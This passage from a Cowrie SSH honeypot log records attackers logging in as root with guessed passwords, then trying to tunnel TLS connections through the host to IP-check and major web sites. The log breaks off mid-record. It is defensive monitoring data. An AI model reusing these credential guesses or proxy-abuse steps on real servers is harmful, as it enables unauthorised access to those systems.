{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T05:26:35.973336Z","src_ip":"212.227.235.229","session":"5d3ef0a13ded"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T05:26:36.080194Z","src_ip":"212.227.235.229","session":"5d3ef0a13ded"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:26:36.633567Z","src_ip":"212.227.235.229","session":"5d3ef0a13ded"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":58490,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecaf1c324871","protocol":"ssh","message":"New connection: 45.88.8.186:58490 (1.2.3.4:22) [session: ecaf1c324871]","sensor":"my-vps","timestamp":"2025-08-26T05:26:37.506883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:26:38.292444Z","src_ip":"45.88.8.186","session":"ecaf1c324871"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T05:26:38.293152Z","src_ip":"45.88.8.186","session":"ecaf1c324871"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.216.40.100","dst_port":443,"src_ip":"212.227.235.229","src_port":57208,"message":"direct-tcp connection request to 54.216.40.100:443 from 127.0.0.1:57208","sensor":"my-vps","timestamp":"2025-08-26T05:26:40.697734Z","session":"5d3ef0a13ded"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.216.40.100","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03!\\x1a}\\xe0K\\xf6\\xd9\\xa6\\xef\\xf87*\\x9e$\\xe8\\x1eJ\\xab\\x94^\\xf7O}v\\xa3\\n\\\\O\\x95#\\xfc` \\xa2\\x0e\\x81Fh{\\xa4&M\\xfdG\\xca3\\x19Z\\xb4\\xfb6\\x96R\\xb3R\\xee\\x89`\\xaar\\xd8\\x19\\x14\\xb2\\xbd\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 6 d\\x99\\x84\\xc4#e\\xef\\xba\\xfeIC\\xdd\\xc9\\x81{\\xf7Y\\x1d<\\xf7n\\xca\\x97\\x11\\x97\\xb6\\xf5\\xc5\\x81C\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.216.40.100:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03!\\x1a}\\xe0K\\xf6\\xd9\\xa6\\xef\\xf87*\\x9e$\\xe8\\x1eJ\\xab\\x94^\\xf7O}v\\xa3\\n\\\\O\\x95#\\xfc` \\xa2\\x0e\\x81Fh{\\xa4&M\\xfdG\\xca3\\x19Z\\xb4\\xfb6\\x96R\\xb3R\\xee\\x89`\\xaar\\xd8\\x19\\x14\\xb2\\xbd\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 6 d\\x99\\x84\\xc4#e\\xef\\xba\\xfeIC\\xdd\\xc9\\x81{\\xf7Y\\x1d<\\xf7n\\xca\\x97\\x11\\x97\\xb6\\xf5\\xc5\\x81C\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T05:26:40.874361Z","src_ip":"212.227.235.229","session":"5d3ef0a13ded"}
{"eventid":"cowrie.login.success","username":"root","password":"best@1@1","message":"login attempt [root/best@1@1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:26:41.179792Z","src_ip":"45.88.8.186","session":"ecaf1c324871"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:26:41.758927Z","src_ip":"45.88.8.186","session":"ecaf1c324871"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"95.101.185.4","dst_port":443,"src_ip":"212.227.235.229","src_port":57642,"message":"direct-tcp connection request to 95.101.185.4:443 from 127.0.0.1:57642","sensor":"my-vps","timestamp":"2025-08-26T05:26:42.172669Z","session":"5d3ef0a13ded"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"95.101.185.4","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x033\\x17\\xc1t\\xc7?p|;\\xe1\\xbf\\x03+\\xa6\\xcc\\x02\\xa60dw\\xf7\\xc6\\xe7\\x88$?)]\\x0b\\xde\\x9b\\x97 9{\\xe3H#\\x85\\x86\\xfch\\xf5\\x86\\xa2(\\xb6\\x17G\\xf6\\xc7\\x8a^\\xe6\\x01q\\x1dN\\xae\\x86\\x10\\x15y\\xf5\\x12\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xa0\\x1b%\\x9crmSV\\xa9\\xf9\\x05\\x11F\\xaf\\x93=\\x86U\\x81N\\x94\\xbaC\\x0c\\x818f@\\xbf\\x92\\x19b\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 95.101.185.4:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x033\\x17\\xc1t\\xc7?p|;\\xe1\\xbf\\x03+\\xa6\\xcc\\x02\\xa60dw\\xf7\\xc6\\xe7\\x88$?)]\\x0b\\xde\\x9b\\x97 9{\\xe3H#\\x85\\x86\\xfch\\xf5\\x86\\xa2(\\xb6\\x17G\\xf6\\xc7\\x8a^\\xe6\\x01q\\x1dN\\xae\\x86\\x10\\x15y\\xf5\\x12\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xa0\\x1b%\\x9crmSV\\xa9\\xf9\\x05\\x11F\\xaf\\x93=\\x86U\\x81N\\x94\\xbaC\\x0c\\x818f@\\xbf\\x92\\x19b\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T05:26:45.538909Z","src_ip":"212.227.235.229","session":"5d3ef0a13ded"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.251.39.4","dst_port":443,"src_ip":"212.227.235.229","src_port":59122,"message":"direct-tcp connection request to 142.251.39.4:443 from 127.0.0.1:59122","sensor":"my-vps","timestamp":"2025-08-26T05:26:48.753674Z","session":"5d3ef0a13ded"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.251.39.4","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd5\\x9b\\xf8\\xd1\\xe0\\x99\\x92S\\xf5(vM\\x9cs\\x10>~'{=\\xc2\\\\\\xbb\\xfb\\x85\\xe3\\r\\x07\\xf6M\\x8am \\xcd\\x064\\xb0\\xf1\\xca\\xd3\\x07,\\x0c?\\xa7R\\x99<\\x8e\\t1S\\xd9\\x97\\xac\\xbad%\\xd87\\xed\\xc9x\\xaa;\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x03\\xf1\\xc1\\xf5\\x8a\\x84\\x8a|`\\xa8\\xcf+\\x03\\xc2P\\xbb\\\\\\xbc\\x03\\xaeL\\xa4L\\x06\\xf2\\xd1C;o\\x1c\\xe1I\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.251.39.4:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd5\\x9b\\xf8\\xd1\\xe0\\x99\\x92S\\xf5(vM\\x9cs\\x10>~'{=\\xc2\\\\\\xbb\\xfb\\x85\\xe3\\r\\x07\\xf6M\\x8am \\xcd\\x064\\xb0\\xf1\\xca\\xd3\\x07,\\x0c?\\xa7R\\x99<\\x8e\\t1S\\xd9\\x97\\xac\\xbad%\\xd87\\xed\\xc9x\\xaa;\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x03\\xf1\\xc1\\xf5\\x8a\\x84\\x8a|`\\xa8\\xcf+\\x03\\xc2P\\xbb\\\\\\xbc\\x03\\xaeL\\xa4L\\x06\\xf2\\xd1C;o\\x1c\\xe1I\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0